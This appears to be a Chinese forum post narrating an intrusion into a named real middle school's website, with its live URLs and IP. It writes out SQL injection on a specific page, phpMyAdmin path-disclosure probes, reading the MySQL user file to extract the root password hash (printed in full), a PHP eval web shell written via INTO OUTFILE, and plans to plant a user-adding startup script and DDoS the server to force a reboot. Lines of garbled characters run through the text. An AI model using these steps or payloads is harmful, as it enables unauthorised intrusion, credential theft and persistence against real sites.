友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
. X" N  _5 Y# a, t: ^9 X


; x9 K9 }6 E  F3 a, ]5 s1 \4 ~常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

8 ]0 _3 K7 u: G7 i2 E% h9 }% X那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
5 E1 X: F9 ?+ n$ g5 x  a3 \/ {
试着爆绝对路径：
/ j2 N0 n" }5 }) K1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
5 Z# m  J. B- d5 z3./load_file()  
6 }% ?7 r' m' `& L4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
8 V4 b+ f: _% F; Y2 k1 M$ b6 @6./phpmyadmin/libraries/lect_lang.lib.php  
" v% f$ ]: C$ \5 `. E7./phpmyadmin/libraries/mcrypt.lib.php   
6 U5 M4 f$ x5 B% ?8./phpmyadmin/libraries/export/xls.php  
, t, Y- J5 E( q( J1 M8 d
均不行...........................

御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
+ i" B% K) U# E+ Z
+ t6 w$ n/ V# T5 [9 n权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

* y1 z2 \7 R0 u" V8 B默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

7 G* x/ o% K# h: X想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

  n, ?" `  L3 j) Y) v8 ~* ~自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
8 H: Z1 n, c' n
成功读到root密码：

8 i9 `5 h3 \- d& q17---- r(0072)
& ]" H+ z/ P) }18---- o(006f)
19---- o(006f)
20---- t(0074)
21---- *(002a)
" P7 {, {2 y' n22---- 8(0038)
23---- 2(0032)
% O  h! R4 ], ^+ \/ |' Z. ]" A24---- E(0045)
25---- 1(0031)
. H* G6 z) j- g+ E2 ~- [- |1 ?26---- C(0043)
' k! J0 N" r3 E+ V' f- q& T% |27---- 5(0035)
. F, N- d$ t! w) }1 ~28---- 8(0038)
, C3 Y7 p4 S) b; D/ a29---- 2(0032)
30---- 8(0038)
$ j/ X1 }1 ?& P! W$ B31---- A(0041)
32---- 9(0039)
33---- B(0042)
34---- 5(0035)
35---- 4(0034)
5 u: \! ?; A9 L/ U# R' b8 F! C36---- 8(0038)
# V& j8 D" j- V  f1 O37---- 6(0036)
' A. q1 B6 N3 m38---- 4(0034)
39---- 9(0039)
$ D2 c1 m: k* b; ^40---- 1(0031)
5 f# u# M* i9 b9 ~, l/ }6 ]. @41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
( e9 Q" |4 Q- U% t% H44---- 5(0035)
; u+ k3 _+ O9 i: M9 `  [45---- 9(0039)
/ Y- F1 m4 e! g) ?+ o% b' h, ?46---- 8(0038)
47---- F(0046)
48---- F(0046)
49---- 4(0034)
50---- F(0046)
51---- 0(0030)
' v2 Y. g7 N) v5 |52---- 3(0033)
3 A. @5 t) N4 K53---- 2(0032)
54---- A(0041)
( j1 Y& [8 |; a3 J0 w4 P7 X% j55---- 4(0034)
, `0 X$ l( g, G( o1 w56---- A(0041)
6 a4 L" w3 n8 U8 ]" G7 y57---- B(0042)
. q9 ~( c+ I$ I- W58---- *(0044)
: C1 n5 E/ s5 n6 N+ b* H* M59---- *(0035)
, p0 a' R0 V' ?" C" `, H  \3 K60---- *(0041)
7 H& k/ `" j, [" K3 E0 F) u+ n4 O# D61---- *0032)

% [- u2 U" U5 p- |( j解密后成功登陆phpmyamin
- P; r) [6 c( y                          
- {! q7 t1 ?* l& m' L
                             

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

成功执行，拿下shell，菜刀连接：
+ y6 Q5 g1 v+ r( B0 l1 B4 u! Y4 t
服务器不支持asp,aspx,php提权无果...................
8 Y% j, q* Y- o0 D; f
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

! _9 C' {3 i% T# G% V9 l6 I

别名     administrators
) v- {. x0 m8 I' k2 Y注释     管理员对计算机/域有不受限制的完全访问权

6 q+ U: Q* a, S- x/ z& K& i

成员

-------------------------------------------------------------------------------
admin
7 B: \  l* }$ O. @8 HAdministrator
slipper$
sqluser
命令成功完成。

0 ^0 g; I/ @! t. d" @服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
, e* I! J; y% y
ddos服务器重启，不然就只能坐等服务器重启了...............................
" M2 c" H0 t. t. E
      

angel